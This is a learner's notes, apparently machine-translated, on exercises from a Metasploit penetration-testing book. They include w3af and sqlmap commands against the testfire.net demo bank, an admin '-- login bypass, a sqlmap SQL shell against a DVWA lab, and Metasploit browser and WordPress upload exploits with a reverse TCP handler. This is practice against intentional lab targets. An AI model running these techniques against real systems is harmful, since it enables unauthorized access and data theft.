"Metasploit Devil Training Camp" chapter fourth (under)

Source: Internet
Author: User

p163 XSSF

The default Kali 2.0 does not have XSSF, first download: https://code.google.com/archive/p/xssf/downloads

Unzip the downloaded zip file, merge the data, plugins, lab and other folders into the appropriate folder in the/usr/share/metasploit-framework/, then load XSSF in Msfconsole.

According to the book, but the final attack did not succeed!

8  the ['...] ['exploit:windows/browser/ie_createobject'[*] Exploit execution Started, press [CTRL + C] to stop it! [+] Remaining victims to attack: [[1] (1)]  (stop here to stay)^c[-] Exploit interrupted by the Console user

p180 Practical Work

1. Probing SQL injection vulnerability in www.testfire.net:

[Email protected]:~# w3af_console W3af>>>PLUGINSW3AF/plugins>>>Audit Sqli W3af/plugins>>>Crawl Web_spider w3af/plugins>>>BACKW3AF>>>TARGETW3AF/config:target>>> Set Target http://www.testfire.net/bank/login.aspxW3af/config:target>>>backthe configuration has been saved.w3af>>>PLUGINSW3AF/plugins>>>Output html_file w3af/plugins>>>output config html_file w3af/plugins/output/config:html_file>>>set verbose True w3af/plugins/output/config:html_file>>>backthe configuration has been saved.w3af/plugins>>>BACKW3AF>>> start

Successfully swept out 8 URLs and different injections points.

Sweep with Sqlmap.

" http://www.testfire.net/bank/login.aspx " " Uid=admin&passw=a&btnsubmit=login "

Detect some information from the background database

Easily login in http://www.testfire.net/bank/login.aspx by constructing admin '--input.

But how do you get the information in the database further? I'm not done yet.

2, according to the book p163 do can

3, WXF:HTTPS://GITHUB.COM/FORCED-REQUEST/WXF

Unzip after download, switch to unzip directory, run./console, prompt

/usr/lib/ruby/2.2. 0/rubygems/core_ext/kernel_require.rb:si: in ' Require': Cannot load such FILE--Iconv (Loaderror)

Because of the lack of familiarity with Ruby, the online approach also does not understand, skip.

4, I choose this vulnerability to test https://www.exploit-db.com/exploits/37182/

However, the resulting test results are:

Do not know whether the background Server software version issue.

5, do not know how to get. Skip first.

6. Successfully implanted SQL shell! with the following command

' http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit# '  --cookie='security=low; PHPSESSID=7918OEOATNUR63RQ8BOKN88SD2' --sql-shell

7, p177

Follow the prompts step-by-step, but without success:

[*] Started Reverse TCP handler on10.10.10.128:4444 [*] successfully uploaded shell. [*] Trying to access shell at <! DOCTYPE HTML Public"-//ietf//dtd HTML 2.0//en">Head><title>413Request Entity Too large</title></Head><body>The requested resource&LT;BR/>/wordpress//wp-content/plugins/1-flash-gallery/upload.php<br/>Does not allow request for data with POST requests, or the amount of data providedinchThe request exceeds the capacity limit.</body>... [*] Exploit completed, but no session is created.

"Metasploit Devil Training Camp" chapter fourth (under)

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.